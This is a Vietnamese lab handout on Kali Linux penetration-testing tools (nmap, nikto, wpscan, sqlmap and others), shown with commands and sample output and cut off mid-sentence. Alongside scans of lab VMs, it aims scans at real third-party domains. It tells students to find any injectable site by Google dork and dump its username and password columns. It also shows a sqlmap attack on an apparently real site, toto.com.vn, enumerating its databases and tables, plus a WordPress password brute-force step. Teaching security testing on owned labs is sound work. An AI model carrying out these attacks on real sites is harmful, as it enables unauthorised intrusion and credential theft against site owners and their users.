Lab 6

THỰC HÀNH CÁC CÔNG CỤ
KIỂM THỬ XÂM NHẬP MẠNG TRÊN KALI LINUX

1. Chuẩn bị
2. THU THẬP THÔNG TIN HỆ THỐNG
2.1 Công cụ theHarvester thu thập thông tin máy chủ
2.2 Công cụ Dmitry lấy thông tin Website
2.3 Công cụ whois thu thập thông tin máy chủ
2.4 Công cụ Uniscan quét lỗi bảo mật Website
2.5 Công cụ Nikto dò tìm lỗi website cơ bản
2.6 Công cụ darkjumper kiểm tra lỗi bảo mật các trang Web
2.7 Công cụ WPScan Tool quét các lỗ hổng bảo mật trên WordPress
2.8 Công cụ Joomscan quét các lỗ hổng bảo mật trên Joomla Website
2.9 Công cụ tlssled
2.10 Công cụ sslscan liệt kê các bộ mã hóa và chứng chỉ trên máy chủ
2.11 Công cụ OpenSSL
2.12 Công cụ nmap
2.13 Công cụ sqlmap phân tích lỗ hổng SQL (Vulnerability Analysis)
2.13.1 Khai thác các lệnh sqlmap
2.13.2 Khai thác các lệnh sqlmap với website www.abc.com
2.13.3 Lab02 – Tấn công SQL Injection
2.13.4 Công cụ sqlmap GUI
2.14 Công cụ xsser khai thác lỗi XSS
2.15 Công cụ Skipfish – Web Application Security Scanner for XSS, SQL Injection, Shell
injection
2.16 Công cụ Amap
2.17 Công cụ DNSenum thu thập thông tin DNS
2.18 Hash-Identifier
2.19 Công cụ Traceroute tool - sử dụng VisualRoute
2.20 Traceroute tool - Hướng dẫn sử dụng Path Analyzer Pro
2.21 Automater Kali Linux - Công cụ phân tích website, Md5 Hash OSINT
2.22 Acccheck Kali linux - Tool kiểm list danh sách password
3. BÀI TẬP
1. Chuẩn bị
Cài đặt Kali
Cách 1: Cài đặt Kali Linux trên Win 10 sử dụng Windows Subsystem
Cách 2: Tải và cài đặt máy ảo Kali Linux
1. Truy cập link https://www.offensive-security.com/kali-linux-vm-vmware-
virtualbox-image-download/
2. Kích chọn máy ảo Kali Linux VMware 64-Bit cho hệ điều hành Win 64bit
3. Có thể sao chép link và dùng IDM để tải cho nhanh.
4. Cài VMWare trên máy.
5. Giải nén file máy ảo và chạy file *.vmx
6. Xuất hiện cửa sổ đăng nhập: account: root, password: toor
2. Thu thập thông tin và quét hệ thống
2.1 Công cụ theHarvester thu thập thông tin máy chủ
Công cụ theHarvester dựa vào nhiều nguồn tìm kiếm như google, google-profiles, bing,
Linkedin hoặc Shodan để thu thập thông tin. Ví dụ để thu thập thông tin về một công ty
ABC nào đó, NSD có thể tìm địa chỉ email, tên máy chủ và nhiều thông tin liên quan đến
công ty đó bằng theHarvester.
Thực hành các lệnh sau khi máy có kết nối internet
user01@VMKali:~$ theharvester -d www.facebook.com -l 500 -b google
user01@VMKali:~$ theharvester -d dut.udn.vn -l 500 -b google
user01@VMKali:~$ theharvester -d google.com.vn -l 500 -b google
user01@VMKali:~$ theharvester -d microsoft.com -l 500 -b google -f myresults.html
user01@VMKali:~$ theharvester -d microsoft.com -b pgp, virustotal
user01@VMKali:~$ theharvester -d microsoft -l 200 -b linkedin
user01@VMKali:~$ theharvester -d microsoft.com -l 200 -g -b google
user01@VMKali:~$ theharvester -d apple.com -b googleCSE -l 500 -s 300
user01@VMKali:~$ theharvester -d cornell.edu -l 100 -b bing -h
2.2 Công cụ Dmitry lấy thông tin Website
DMitry (Deepmagic Information Gathering Tool) có chức năng lookups thông tin
domain website, thu thập thông tin của domain phụ, địa chỉ email, thông tin về thời gian
hoạt động, quét cổng TCP, tìm kiếm whois, v.v .
Chức năng:
• Thu thập địa chỉ email trên một host.
• Thực hiên quét cổng TCP trên một host.
• Thu thập các subdomain trên một host.
• Thu thập Whois trên một host.
• Lấy các thông tin của một host từ Netcraft.
1) Dò tìm thông tin (Whois) một Website:

user01@VMKali:~$ dmitry -w 192.168.1.10
102170044@kali:~$ dmitry -p 192.168.1.10
Deepmagic Information Gathering Tool
"There be some deep magic going on"
HostIP:192.168.1.10
HostName:kali
Gathered TCP Port information for 192.168.1.10
---------------------------------
Port State
22/tcp open
80/tcp open
139/tcp open
Portscan Finished: Scanned 150 ports, 146 ports were in state closed
All scans completed, exiting
user01@VMKali:~$ dmitry -w www.facebook.com
user01@VMKali:~$ dmitry -w www.google.com
user01@VMKali:~$ dmitry -winsepo toto.com.vn toto.com.vn.txt
2) Xem các thông tin Internet Number bao gồm: địa chỉ IP, số hiệu mạng ASN
user01@VMKali:~$ dmitry -i www.google.com
3) Thu thập các subdomain:

user01@VMKali:~$ dmitry -s www.google.com
4) Để thu thập email của một website

user01@VMKali:~$ dmitry -e www.google.com
5) Quét các cổng TCP của máy chủ Web

user01@VMKali:~$ dmitry -p 192.168.1.10
user01@VMKali:~$ dmitry -p 192.168.1.115
//192.168.1.115 là địa chỉ của máy VMMetasploitableLinux2
2.3 Công cụ whois thu thập thông tin máy chủ

user01@VMKali:~$ whois stackoverflow.com
user01@VMKali:~$ whois -h whois.crsnic.net "domain google.com"
=> Tool online:

http://whois.domaintools.com/
https://whois.icann.org/en
2.4 Công cụ Uniscan quét lỗi bảo mật Website
Uniscan có thể quét được các lỗi thường gặp của một website như LFI, RFI, SQL
Injection, XSS ... Uniscan được viết bằng Perl.
1) Quét lỗi của một website:
kali@VMKali:~$ sudo uniscan -u http://192.168.1.10/mutillidae/ -qweds
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3)With great power comes great responsibility.
[sudo] password for 102170044:
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
Scan date: 25-1-2021 20:45:18
==========================================================================================
=========
| Domain: http://192.168.1.10/mutillidae/
| Server: Apache/2.4.41 (Debian)
| IP: 192.168.1.10
==========================================================================================
=========
|
| Directory check:
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/ajax/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/classes/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/data/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/images/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/includes/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/javascript/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/phpmyadmin/
| [+] CODE: 200 URL: http://192.168.1.10/mutillidae/styles/
…
|
| Crawler Started:
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
^C[*] Crawling: [247 - 316]
…
user01@VMKali:~# uniscan -u https://www.toto.com/ -qweds
>> Thay thế www.toto.com bằng một tên miền của Website trên Internet
2) Để quét nhiều website cùng một lúc:

user01@VMKali:~# uniscan -f websites.txt -bqweds
wesites.txt là một danh sách website đã được chuẩn bị sẵn.

3) Chức năng tìm kiếm dork với Google
user01@VMKali:~# uniscan -o 'inurl:"index.php?id="'
2.5 Công cụ Nikto dò tìm lỗi website cơ bản
Nikto là một phần mềm mã nguồn mở được sử dụng kiểm tra các vấn đề bảo mật của
Web Server bằng một hệ thống cơ sở dữ liệu riêng đến khoảng 70 ngàn lỗi bảo mật thông
thường được tìm thấy và cập nhật với từng phiên bản. Các lỗ hổng bảo mật mà Web Server
thường gặp phải như : các cấu hình phía dịch vụ máy chủ hoặc phần mềm sai sót, các
chương trình hay file mặc định được tìm thấy, các chương trình hay file không an toàn được
tìm thấy, những lỗ hổng cơ bản ở ứng dụng web,..
1) Xem thông tin về nikto.pl
user01@VMKali:~# nikto
2) Kiểm tra nhanh lỗi web server

//192.168.1.115 là địa chỉ của máy VMMetasploitableLinux2
user01@VMKali:~# nikto -host http://192.168.1.10
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.10
+ Target Hostname: 192.168.1.10
+ Target Port: 80
+ Start Time: 2021-01-25 20:49:05 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 29cd, size:
580a7a1fa9140, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ OSVDB-561: /server-status: This reveals Apache information. Comment out appropriate line
in the Apache conf file or restrict access to allowed sources.
+ 7916 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2021-01-25 20:50:09 (GMT-5) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
user01@VMKali:~# nikto -host http://192.168.1.115
user01@VMKali:~# nikto -host http://192.168.1.115 -p 80 -T 3478b -t 3 -D \ V -o

webtest -F htm
user01@VMKali:~# nikto -h webscantest.com
user01@VMKali:~# nikto -h webscantest.com -p 80 -T 3478b -t 3 -D \ V -o webtest -F

htm
user01@VMKali:~# nikto -h wonderhowto.com
user01@VMKali:~# nikto -h facebook.com

Trong kết quả xuất ra chứa các thông tin cơ bản. Cần chú ý đến thông tin về lỗi “OSVDB-
<serial>“. Đây chính là thông tin về lỗi bảo mật mà nikto khai thác và phát hiện được Tham
khảo lỗi tại: http://osvdb.org/<serial>
3) Dò tìm lỗi theo port
user01@VMKali:~# nikto -host http://192.168.1.10/mutillidae/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.10
+ Target Hostname: 192.168.1.10
+ Target Port: 80
+ Start Time: 2021-01-25 20:56:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ X-XSS-Protection header has been set to disable XSS Protection. There is unlikely to be
a good reason for this.
+ Uncommon header 'logged-in-user' found, with contents:
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Cookie showhints created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 8 entries which should be manually viewed.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via
a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ Web Server returns a valid response with junk HTTP methods, this may cause false
positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-
us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /mutillidae/index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket
add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.
(probably Rocket, but could be any index.php)
+ /mutillidae/phpinfo.php: Output from the phpinfo() function was found.
….
user01@VMKali:~# nikto -host https://www.toto.com.vn -port 8080
user01@VMKali:~# nikto -host https://www.toto.com.vn:8080
4) Dò tìm lỗi chạy thông qua Proxy

user01@VMKali:~# nikto -host https://www.toto.com.vn -useproxy
http://localhost:8080/
5) Cập nhật cơ sở dữ liệu cho nikto

user01@VMKali:~# nikto -update
2.6 Công cụ darkjumper kiểm tra lỗi bảo mật các trang Web
Darkjumper thực hiện tìm từng trang web cùng lưu trữ tại một máy chủ chung. Sau đó sẽ
kiểm tra lỗi bảo mật của từng trang web trên máy chủ.
Chức năng:
• Quét các lỗi như SQL Injection, Remote File Inclusion, Local File Inclusion.
• Định danh các user trên server.
• Hỗ trợ proxy khi quét.
• Quét cổng trên máy chủ.

>> Lệnh này chỉ thực hiện khi có quyền root và kết nối internet
wget http://ignum.dl.sourceforge.net/project/darkjumper/darkjumper.v5.7.tar.gz
tar xzvf darkjumper.v5.7.tar.gz
mv darkjumper.v5.7 /darkjumper.v5.7
1) Để reverse ip của một trang:

user01@kali:~$ cd /darkjumper.v5.7/
user01@kali:/darkjumper.v5.7$
user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.10 -m full

################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
Darkjumper.py version 5.7
Developed by : mywisdom & gunslinger_
Date version release : Wednesday, 24 Feb 2010 $ 9:13 PM
Dedicated to darkc0de.com, devilzc0de.org,jatimcrew.org,flash-crew.com, jasakom.com,
h4cky0u.org and 0c0de.com
[+] Target hostname : 192.168.1.10
[+] Target IP : 192.168.1.10
[+] Use proxy : None
[+] Verbocity : False
[+] Time Starting : 20:59:53
….
user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.10 -m reverseonly
user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.115 -m full
user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.115 -m reverseonly
user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t webscantest.com -m full
user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t toto.com.vn -m reverseonly
2) Lấy các thông tin header của một Website

user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.115 -m headerinfo
3) Để xem các dịch vụ đang chạy trên máy chủ:
user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.10 -m daemoninfo
Darkjumper.py version 5.7
Developed by : mywisdom & gunslinger_
Date version release : Wednesday, 24 Feb 2010 $ 9:13 PM
Dedicated to darkc0de.com, devilzc0de.org,jatimcrew.org,flash-crew.com, jasakom.com,
h4cky0u.org and 0c0de.com
[+] Target hostname : 192.168.1.10
[+] Target IP : 192.168.1.10
[+] Use proxy : None
[+] Verbocity : False
[+] Time Starting : 21:02:08
[+] Try to getting daemon info...
[+] Please wait...
----------------------------------------
[+] Daemon informations from common ports: 21,22,23,25,80,110 and 3306:
[+] Daemon response (info) from port 22 (ssh Daemon):
SSH-2.0-OpenSSH_7.9p1 Debian-10
[+] Daemon response (info) from port 80 (httpd):
HTTP/1.1 400 Bad Request
Date: Tue, 26 Jan 2021 02:02:09 GMT
Server: Apache/2.4.41 (Debian)
Content-Length: 301
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.41 (Debian) Server at 127.0.1.1 Port 80</address>
</body></html>
Important! You can see informations such as: web server version,ssl version,php
version,perl version
[+] DONE !
4) Để có thể định danh các người dùng (user) trên máy chủ:
user01@kali:/darkjumper.v5.7$ sudo ./darkjumper.py -t 192.168.1.115 -m enum
5) Để kiểm tra xem máy chủ FTP có cho phép người dùng nặc danh truy cập hay không:
user01@kali:/darkjumper.v5.7$ sudo./darkjumper.py -t 192.168.1.10 -m anon
2.7 Công cụ WPScan Tool quét các lỗ hổng bảo mật trên WordPress
WPScan được viết trên ngôn ngữ Ruby. WPScan thường được các chuyên gia bảo mật
và các quản trị viên của WordPress sử dụng để kiểm tra các lỗi bảo mật.
Tính năng của WPScan:
• Thu thập các tên đăng nhập trên WordPress.
• Bruteforce các mật khẩu trên WordPress.
• Kiểm tra phiên bản của WordPress.
• Kiểm tra plugin của WordPress.

• Quét các lỗi bảo mật trên WordPress.
1) Quét những thông tin cơ bản trên Wordpress (-u): các đường dẫn thư mục trên máy chủ
web, thu thập thông tin phiên bản Wordpress, lấy các thông tin HTTP Response như tên máy
chủ
user01@VMKali:~$ wpscan –u optinmonster.com
2) Quét các giao diện trên WordPress (--enumerate -t)

user01@VMKali:~$ wpscan --enumerate -t optinmonster.com
3) Quét các giao diện có lỗ hổng bảo mật trên WordPress (--enumerate -vt)
user01@VMKali:~$ wpscan --enumerate -vt optinmonster.com
Nếu WPScan tìm được lỗ hổng trong giao diện WordPress thì xuất hiện dấu chấm than màu
đỏ trong kết quả dòng lệnh được xuất ra.
4) Quét các plugin trên WordPress ( --enumerate -p)
user01@VMKali:~$ wpscan --enumerate -p optinmonster.com
5) Quét các plugin trên WordPress có những lỗ hổng bảo mật như SQL Injection, XSS,...
( --enumerate -vp)
user01@VMKali:~$ wpscan --enumerate -vp optinmonster.com
Nếu WPScan tìm được lỗ hổng trong giao diện WordPress thì xuất hiện dấu chấm than màu
đỏ trong kết quả dòng lệnh được xuất ra.
6) Thu thập được các tên đăng nhập WordPress (--enumerate u)
user01@VMKali:~$ wpscan --enumerate -u optinmonster.com
7) Dò tìm mật khẩu

§ Sau khi đã định danh được tên đăng nhập thì hacker có thể đoán mật khẩu thông
qua cuộc tấn công brute force.
§ Tạo một file văn bản có chứa các chữ thường dùng để đặt mật khẩu, mỗi dòng là
một mật khẩu có tên passwords.txt
user01@VMKali:~$ wpscan -u 192.168.1.115 --wordlist passwords.txt threads 50
2.8 Công cụ Joomscan quét các lỗ hổng bảo mật trên Joomla Website
Joomscan là một công cụ dùng để tìm lỗ hổng bảo mật trên hệ thống quản trị nội dung
(CMS) Joomla và được các nhà phát triển (developer) web sử dụng để tìm lỗ hổng bảo mật
trên website. Joomscan được viết trên ngôn ngữ Perl. Joomscan phát hiện được các lỗi trên
Joomla như SQL Injection, XSS và CSRF. Phiên bản cập nhật của Joomscan có thể phát
hiện 550 lỗ hổng bảo mật.
Một vài tính năng của Joomscan:
§ Tìm kiếm các lỗ hổng bảo mật của Joomla và thành phần (component) của
Joomla.
§ Xuất kết quả ra định dạng .txt và .html.
§ Phát hiện ứng dụng web tường lửa của Joomla.
8) Quét lỗ hổng bảo mật của Website Joomla
user01@VMKali:~$ joomscan –u websitejoomla.com
Nếu phát hiện được lỗ hổng nào thì ngay tại Vulnerable sẽ là Yes, ngược lại sẽ là No
9) Sử dụng proxy khi quét:
user01@VMKali:~$ joomscan -u websitejoomla.com -x địa_chỉ_proxy:cổng
2.9 Công cụ tlssled
Evaluates the security of a target SSL/TLS (HTTPS) server

user01@VMKali:~$ tlssled 192.168.1.10 80
------------------------------------------------------
TLSSLed - (1.3) based on sslscan and openssl
by Raul Siles (www.taddong.com)
------------------------------------------------------
opensslversion: OpenSSL 1.1.1c 28 May 2019
------------------------------------------------------
Date:20210125-210745
------------------------------------------------------
[*] Analyzing SSL/TLS on 192.168.1.10:80 ...
[.]Output directory: TLSSLed_1.3_192.168.1.10_80_20210125-210745 ...
[*] Checking if the target service speaks SSL/TLS...
[.] The target service 192.168.1.10:80 seems to speak SSL/TLS...
[.] Using SSL/TLS protocol version:
(empty means I'm using the default openssl protocol version(s))
[*] Running sslscan on 192.168.1.10:80 ...
[-] Testing for SSLv2 ...
[-] Testing for the NULL cipher ...
[-] Testing for weak ciphers (based on key length - 40 or 56 bits) ...
[+] Testing for strong ciphers (based on AES) ...
[-] Testing for MD5 signed certificate ...
[.] Testing for the certificate public key length ...
[.] Testing for the certificate subject ...
[.] Testing for the certificate CA issuer ...
[.] Testing for the certificate validity period ...
Today: Tue 26 Jan 2021 02:07:55 AM UTC
[.] Checking preferred server ciphers ...
[*] Testing for SSL/TLS renegotiation MitM vuln. (CVE-2009-3555) ...
[+] Testing for secure renegotiation support (RFC 5746) ...
SecureRenegotiation IS NOT supported
[*] Testing for SSL/TLS renegotiation DoS vuln. (CVE-2011-1473) ...
[.] Testing for client initiated (CI) SSL/TLS renegotiation (insecure)...
UNKNOWN
[*] Testing for client authentication using digital certificates ...
SSL/TLSclient certificate authentication IS NOT required
[*] Testing for TLS v1.1 and v1.2 (CVE-2011-3389 vuln. aka BEAST) ...
[-] Testing for SSLv3 and TLSv1 support ...
[+] Testing for RC4 in the prefered cipher(s) list ...
[.] Testing for TLS v1.1 support ...
TLS v1.1 IS NOT supported
[.] Testing for TLS v1.2 support ...
TLSv1.2 IS NOT supported
[*] Testing for HTTPS (SSL/TLS) security headers using HTTP/1.0 ...
[+] Testing for HTTP Strict-Transport-Security (HSTS) header ...
[+] Testing for cookies with the secure flag ...
[-]Testing for cookies without the secure flag ...
[*] Testing for HTTPS (SSL/TLS) security headers using HTTP/1.1 & Host ...
[+] Testing for HTTP Strict-Transport-Security (HSTS) header ...
[+] Testing for cookies with the secure flag ...
[-]Testing for cookies without the secure flag ...
[*] New files created:
[.]Output directory: TLSSLed_1.3_192.168.1.10_80_20210125-210745 ...
openssl_HEAD_1.0_192.168.1.10_80_20210125-210745.err
openssl_HEAD_1.0_192.168.1.10_80_20210125-210745.log
openssl_HEAD_192.168.1.10_80_20210125-210745.err
openssl_HEAD_192.168.1.10_80_20210125-210745.log
openssl_RENEG_192.168.1.10_80_20210125-210745.err
openssl_RENEG_192.168.1.10_80_20210125-210745.log
openssl_RENEG_LEGACY_192.168.1.10_80_20210125-210745.err
openssl_RENEG_LEGACY_192.168.1.10_80_20210125-210745.log
sslscan_192.168.1.10_80_20210125-210745.log
[*] done
user01@VMKali:~$ tlssled 192.168.1.115 80
user01@VMKali:~$ tlssled www.facebook.com.vn 80
user01@VMKali:~$ tlssled WhiteHat.vn 80
2.10 Công cụ sslscan liệt kê các bộ mã hóa và chứng chỉ trên máy chủ
user01@VMKali:~$ sslscan 192.168.1.10
user01@VMKali:~$ sslscan 192.168.1.115
user01@VMKali:~$ sslscan www.facebook.com.vn
user01@VMKali:~$ sslscan whitehat.vn
2.11 Công cụ OpenSSL
user01@VMKali:~# echo -n | openssl s_client -connect www.google.com:443
2.12 Công cụ nmap
1) Find the software version used on port 22:

nmap -sV 192.168.1.115 -p 22
nmap -sU 192.168.1.115 -p 80,22
2) Find the operating system used on the target machine:

nmap -O 192.168.1.115
nmap -Pn -sT -vv -n -pl -1000 -T4 192.168.1.115
3) Aggressive scanning:
nmap -A 192.168.56.103
4) Utilize the default script categories:

nmap -sC 192.168.1.115
5) Collect information about the HTTP server:

nmap --script http-enum,http-headers,http-methods,http-php-version -p 80
192.168.1.115
2.13 Công cụ sqlmap phân tích lỗ hổng SQL (Vulnerability Analysis)

user01@kali:/# cd /sqlmap/
user01@kali:/sqlmap# python ./sqlmap.py --update
2.13.1 Khai thác các lệnh sqlmap

3) Liệt kê danh sách các database
user01@kali:~$ python /sqlmap/sqlmap.py -u
http://192.168.0.4/mod/resource/view.php?id=1407 --dbs
___
__H__
___ ___[']_____ ___ ___ {1.4.3.11#dev}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and
federal laws. Developers assume no liability and are not responsible for any misuse or damage
caused by this program
[*] starting @ 21:16:13 /2021-01-25/
[21:16:19] [INFO] testing connection to the target URL
got a refresh intent (redirect like response common to login pages) to
'http://192.168.0.4/login/index.php'. Do you want to apply it from now on? [Y/n] Y
you have not declared cookie(s), while server wants to set its own ('MOODLEID_=%25ED
%25C3%...51CC%25B7d;MoodleSession=vs2s0rtrgk7...ufg9bd4501;MoodleSessionTest=tD8xS1AFVh'). Do
you want to use those [Y/n] Y
[21:16:35] [CRITICAL] previous heuristics detected that the target is protected by some
kind of WAF/IPS
[21:16:35] [INFO] testing if the target URL content is stable
[21:16:35] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will
base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are
detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[21:16:38] [INFO] searching for dynamic content
[21:16:39] [CRITICAL] target URL content appears to be heavily dynamic. sqlmap is going to
retry the request(s)
[21:16:41] [WARNING] target URL content appears to be too dynamic. Switching to '--text-
only'
[21:16:41] [INFO] testing if GET parameter 'id' is dynamic
[21:16:41] [WARNING] GET parameter 'id' does not appear to be dynamic
[21:16:41] [INFO] testing for SQL injection on GET parameter 'id'
[21:16:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:16:44] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:16:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)'
[21:16:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:16:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
clause (IN)'
[21:16:49] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:16:50] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:16:51] [INFO] testing 'Generic inline queries'
[21:16:51] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:16:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:16:53] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:16:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:16:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:16:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:16:59] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other
(potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[21:17:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:17:10] [WARNING] GET parameter 'id' does not seem to be injectable
[21:17:10] [CRITICAL] all tested parameters do not appear to be injectable. Try to
increase values for '--level'/'--risk' options if you wish to perform more tests. If you
suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could
try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
….
2.13.2 Khai thác các lệnh sqlmap với website www.abc.com
1) Tìm 1 trang lỗi SQL Injection bất kì trên Google bằng cách tìm kiếm với từ khóa inurl
php?id=
Ví dụ có kết quả dạng: http://www.abc.com/product.php?id=200
2) Kiểm tra lỗi SQL Injection
http://www.abc.com/product.php?id=200’
3) Liệt kê danh sách các database

user01@kali:~$ python /sqlmap/sqlmap.py -u http://www.abc.com/index.php?id=320
--dbs
Có thể bỏ qua database information_schema.

4) Lấy thông tin các bảng trong Database:
user01@kali:~$ python /sqlmap/sqlmap.py -u http://www.abc.vn/index.php?id=320
-D tên_database –tables
5) Chọn 1 tables cần trích xuất thông tin. Lấy thông tin các cột trong đó
-D tên_database -T tên_bảng –columns
6) Lấy dữ liệu cột username

-D tên_database -T tên_bảng -C username –dump
7) Lấy dữ liệu cột Password:

-D tên_database -T tên_bảng -C password --dump
2.13.3 Lab02 – Tấn công SQL Injection

a. Tìm kiếm database đang được sử dụng:
http://toto.com.vn/constructionDetail.php?id=334 –dbs
[17:43:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[17:43:15] [INFO] fetching database names
[17:43:15] [INFO] used SQL query returns 5 entries
[17:43:15] [INFO] retrieved: 'information_schema'
[17:43:15] [INFO] retrieved: 'toto'
[17:43:15] [INFO] retrieved: 'mysql'
[17:43:15] [INFO] retrieved: 'phpmyadmin'
[17:43:16] [INFO] retrieved: 'test'
available databases
[5]:
[*] information_schema
[*] toto
[*] mysql
[*] phpmyadmin
[*] test
Ta có được database của trang web là toto

b. Lập danh sách các table trong database
http://toto.com.vn/constructionDetail.php?id=334 -D toto --tables
[17:43:32] [INFO] fetching tables for database: 'toto'
[17:43:33] [WARNING] reflective value(s) found and filtering out
[17:43:33] [WARNING] frames detected containing attacked parameter values. Please be sure
to test those separately in case that attack on this page fails
[17:43:34] [INFO] retrieved: 'aboutus'
[17:43:34] [INFO] retrieved: 'account'
[17:43:34] [INFO] retrieved: 'account_ext'
[17:43:35] [INFO] retrieved: 'accpriv'
[17:43:35] [INFO] retrieved: 'codong'
[17:43:36] [INFO] retrieved: 'construction'
[17:43:36] [INFO] retrieved: 'contactus'
[17:43:37] [INFO] retrieved: 'counter'
[17:43:37] [INFO] retrieved: 'document'
[17:43:37] [INFO] retrieved: 'forum_sessions'
[17:43:38] [INFO] retrieved: 'group_module'
[17:43:38] [INFO] retrieved: 'groups'
[17:43:38] [INFO] retrieved: 'info'
[17:43:38] [INFO] retrieved: 'linhvuc'
[17:43:38] [INFO] retrieved: 'news'
[17:43:39] [INFO] retrieved: 'partner'
[17:43:39] [INFO] retrieved: 'product'
[17:43:39] [INFO] retrieved: 'property'
[17:43:39] [INFO] retrieved: 'slide'
[17:43:39] [INFO] retrieved: 'subsystem'
[17:43:39] [INFO] retrieved: 'support_setting_config'
[17:43:40] [INFO] retrieved: 'support_setting_config_group'
[17:43:40] [INFO] retrieved: 'tuyendung'
Database:
toto

[23 tables]
+------------------------------+
| aboutus |
| account |
| account_ext |
| accpriv |
| codong |
| construction |
| contactus |
| counter |
| document |
| forum_sessions |
| group_module |
| groups |
| info |
| linhvuc |
| news |
| partner |
| product |
| property |
| slide |
| subsystem |
| support_setting_config |
| support_setting_config_group |
| tuyendung |
+------------------------------+
Ta có được list các bảng của database này. Ta thấy bảng account là 1 bảng chứa những
